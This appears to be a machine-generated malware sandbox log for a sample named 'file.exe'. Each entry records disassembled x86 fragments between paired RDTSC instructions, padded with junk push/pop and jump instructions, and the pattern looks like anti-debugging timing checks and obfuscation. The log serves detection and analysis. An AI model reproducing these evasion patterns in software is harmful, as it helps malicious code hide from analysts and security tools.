Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2F55B2 second address: 2F55D3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE2E9231EA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FE2E9231EB5h 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 356686 second address: 3566B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9211D89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jno 00007FE2E9211D7Eh 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 35BA12 second address: 35BA18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 35BA18 second address: 35BA1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 35BB5F second address: 35BB63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 35BB63 second address: 35BB67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 35BB67 second address: 35BBA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FE2E9231EA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE2E9231EB9h 0x00000013 jmp 00007FE2E9231EB4h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 35BD21 second address: 35BD27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 35C199 second address: 35C1AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007FE2E9231EA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jl 00007FE2E9231EA6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 35C1AE second address: 35C1B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 35C4BB second address: 35C4C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 35C4C0 second address: 35C4E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE2E9211D81h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE2E9211D7Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 35C761 second address: 35C76B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 35C76B second address: 35C7A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 jl 00007FE2E9211D76h 0x0000000e popad 0x0000000f push ecx 0x00000010 jmp 00007FE2E9211D7Ch 0x00000015 pushad 0x00000016 popad 0x00000017 pop ecx 0x00000018 popad 0x00000019 pushad 0x0000001a jmp 00007FE2E9211D7Bh 0x0000001f pushad 0x00000020 jmp 00007FE2E9211D7Dh 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 35C7A7 second address: 35C7AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 361C40 second address: 361C46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 361F11 second address: 361F38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FE2E9231EBEh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 361F38 second address: 361F3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 361F3E second address: 361F42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 361F42 second address: 361F4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 361F4E second address: 361F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2D72C4 second address: 2D72DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FE2E9211D83h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 36ACA9 second address: 36ACAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 36A0E3 second address: 36A0E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 36A0E7 second address: 36A0F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jp 00007FE2E9231EA6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 36A0F7 second address: 36A0FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 36A248 second address: 36A24C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 36A24C second address: 36A25A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FE2E9211D76h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 36A25A second address: 36A264 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE2E9231EA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 36A3DA second address: 36A3E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push edi 0x00000006 pop edi 0x00000007 pop edx 0x00000008 pop edi 0x00000009 pushad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 36A3E7 second address: 36A400 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE2E9231EABh 0x00000009 pop eax 0x0000000a pushad 0x0000000b jc 00007FE2E9231EA6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 36A400 second address: 36A41D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FE2E9211D7Eh 0x0000000e jnp 00007FE2E9211D76h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 36A41D second address: 36A43D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FE2E9231EB0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007FE2E9231EA6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 36A43D second address: 36A441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 36A441 second address: 36A445 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 36A869 second address: 36A86F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 370387 second address: 37038F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 36ECE0 second address: 36ECFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007FE2E9211D76h 0x0000000d jmp 00007FE2E9211D81h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 36F10D second address: 36F111 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 36F111 second address: 36F12D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE2E9211D84h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 36F2BB second address: 36F2D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE2E9231EB5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 31356E second address: 3135CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ecx 0x0000000a call 00007FE2E9211D78h 0x0000000f pop ecx 0x00000010 mov dword ptr [esp+04h], ecx 0x00000014 add dword ptr [esp+04h], 0000001Bh 0x0000001c inc ecx 0x0000001d push ecx 0x0000001e ret 0x0000001f pop ecx 0x00000020 ret 0x00000021 mov ecx, 559A9BE8h 0x00000026 push 00000004h 0x00000028 mov edi, ebx 0x0000002a nop 0x0000002b jne 00007FE2E9211D8Bh 0x00000031 push eax 0x00000032 pushad 0x00000033 pushad 0x00000034 pushad 0x00000035 popad 0x00000036 pushad 0x00000037 popad 0x00000038 popad 0x00000039 push eax 0x0000003a push edx 0x0000003b jo 00007FE2E9211D76h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 36F6B6 second address: 36F6C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FE2E9231EA6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 36F6C2 second address: 36F6E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FE2E9211D84h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007FE2E9211D76h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 36F6E9 second address: 36F6ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 36F6ED second address: 36F719 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9211D7Dh 0x00000007 jmp 00007FE2E9211D86h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 36F719 second address: 36F71F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 37669E second address: 3766A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3766A4 second address: 3766A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3766A8 second address: 3766AE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 376C6D second address: 376CC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FE2E9231EAEh 0x0000000e jmp 00007FE2E9231EB4h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FE2E9231EB4h 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e jmp 00007FE2E9231EB2h 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 376CC4 second address: 376CCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 376CCC second address: 376CD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 37754F second address: 37755C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 37755C second address: 377562 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 377562 second address: 377581 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FE2E9211D88h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 377581 second address: 377587 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 377587 second address: 3775A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE2E9211D86h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 377B2F second address: 377B33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 377B33 second address: 377B55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9211D80h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FE2E9211D7Eh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 377DB4 second address: 377DBE instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE2E9231EAEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 377DBE second address: 377DCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 377DCA second address: 377DCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 377DCE second address: 377DF8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE2E9211D76h 0x00000008 jl 00007FE2E9211D76h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push esi 0x00000016 pop esi 0x00000017 jne 00007FE2E9211D76h 0x0000001d jnc 00007FE2E9211D76h 0x00000023 popad 0x00000024 push ebx 0x00000025 push edi 0x00000026 pop edi 0x00000027 pushad 0x00000028 popad 0x00000029 pop ebx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 37B1B5 second address: 37B1C1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 37B1C1 second address: 37B1C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 37B1C9 second address: 37B1D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007FE2E9231EA6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 37B1D6 second address: 37B1DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 37B766 second address: 37B76C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 37B76C second address: 37B770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 37B770 second address: 37B796 instructions: 0x00000000 rdtsc 0x00000002 js 00007FE2E9231EA6h 0x00000008 jmp 00007FE2E9231EB2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jnc 00007FE2E9231EA6h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 37B796 second address: 37B79A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 37B79A second address: 37B7A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 37B7A0 second address: 37B7EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FE2E9211D7Ch 0x0000000c js 00007FE2E9211D76h 0x00000012 jl 00007FE2E9211D7Ch 0x00000018 jc 00007FE2E9211D76h 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 jnc 00007FE2E9211D8Ch 0x00000027 ja 00007FE2E9211D7Eh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 37B7EB second address: 37B802 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9231EAFh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 37BAA6 second address: 37BAAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3898C9 second address: 3898EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jmp 00007FE2E9231EB5h 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3898EC second address: 389913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 ja 00007FE2E9211D90h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3883B7 second address: 3883D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FE2E9231EB2h 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 388513 second address: 38851C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push edi 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 38851C second address: 388559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FE2E9231EA6h 0x0000000a popad 0x0000000b push esi 0x0000000c jmp 00007FE2E9231EB8h 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 je 00007FE2E9231EA6h 0x0000001f jmp 00007FE2E9231EABh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 388559 second address: 38855D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 38855D second address: 388583 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE2E9231EB1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007FE2E9231EA8h 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3886F1 second address: 3886FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jl 00007FE2E9211D76h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 390397 second address: 3903A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3903A4 second address: 3903B7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jns 00007FE2E9211D76h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3903B7 second address: 3903C1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE2E9231EA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3903C1 second address: 3903CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3903CA second address: 3903D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3903D5 second address: 3903E2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE2E9211D78h 0x00000008 push edi 0x00000009 pop edi 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 39068A second address: 390690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 390690 second address: 39069C instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE2E9211D76h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 39069C second address: 3906BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FE2E9231EB0h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007FE2E9231EA6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 392CE3 second address: 392D00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FE2E9211D84h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
